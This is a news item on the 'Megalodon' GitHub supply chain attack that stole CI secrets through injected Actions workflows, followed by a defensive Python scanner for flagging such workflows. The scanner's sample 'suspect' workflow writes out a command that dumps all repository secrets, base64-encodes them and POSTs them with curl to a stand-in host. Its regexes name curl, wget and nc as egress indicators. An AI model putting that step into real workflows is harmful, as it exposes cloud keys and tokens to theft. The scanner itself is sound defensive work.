
Megalodon Supply Chain Attack Hits 5,500+ GitHub Repositories in Six Hours
A large-scale software supply chain attack dubbed “Megalodon” has compromised more than 5,500 repositories on GitHub, raising fresh concerns about the growing abuse of automated development pipelines and GitHub Actions workflows. The incident, uncovered by SafeDep, involved thousands of malicious commits that injected credential-stealing payloads into repositories over a short period of time.
According to researchers, the Megalodon campaign targeted repositories through automated commits that inserted malicious GitHub Actions workflows capable of harvesting sensitive credentials, cloud access keys, API tokens, and other secrets stored within continuous integration and continuous delivery (...
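One defensive check for the pattern described above: a triage scan over GitHub Actions workflow files that flags `run:` steps which dump the whole `secrets` context or combine a secret reference with outbound transfer. This is an added example, not code from SafeDep or from the reporting; the two workflow texts are constructed samples, and the function and indicator names are the author's own.

```python
import re

# Constructed sample workflows (not taken from the campaign or the page).
BENIGN_WORKFLOW = """name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

SUSPECT_WORKFLOW = """name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo '${{ toJSON(secrets) }}' | base64 -w0 > /tmp/s
          curl -s -X POST --data @/tmp/s https://collector.invalid/upload
"""

SECRET_REF = re.compile(r"\$\{\{[^}]*\bsecrets\b")        # any ${{ ... secrets ... }}
SECRETS_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)")     # wholesale secret dump
EGRESS = re.compile(r"\b(curl|wget|nc|Invoke-WebRequest)\b")
ENCODE = re.compile(r"\bbase64\b")

def run_blocks(text: str) -> list[str]:
    """Extract the shell bodies of all `run:` steps (inline or block scalar)."""
    lines, blocks, i = text.splitlines(), [], 0
    while i < len(lines):
        m = re.match(r"^(\s*)-?\s*run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest and rest not in ("|", ">", "|-", ">-"):   # inline: run: cmd
            blocks.append(rest)
            i += 1
            continue
        body, i = [], i + 1                               # block scalar: deeper-indented lines
        while i < len(lines) and (not lines[i].strip()
                                  or len(lines[i]) - len(lines[i].lstrip()) > indent):
            body.append(lines[i].strip())
            i += 1
        blocks.append("\n".join(body))
    return blocks

def scan_workflow(text: str) -> dict:
    """Return a risk level and the indicators found in the workflow's run steps."""
    hits = set()
    for blk in run_blocks(text):
        if SECRETS_DUMP.search(blk):
            hits.add("secrets_dump")
        if EGRESS.search(blk):
            hits.add("network_egress")
            if SECRET_REF.search(blk):
                hits.add("secret_with_egress")
        if ENCODE.search(blk):
            hits.add("encoding")
    if {"secrets_dump", "secret_with_egress"} & hits:
        risk = "high"
    else:
        risk = "review" if hits else "low"
    return {"risk": risk, "indicators": sorted(hits)}
```

Secrets passed only through `env:` are not flagged, so a legitimate deploy step that curls with a token still shows up as `secret_with_egress` and needs a human look; the scan is a triage aid for reviewing newly added or modified workflow files, not a verdict.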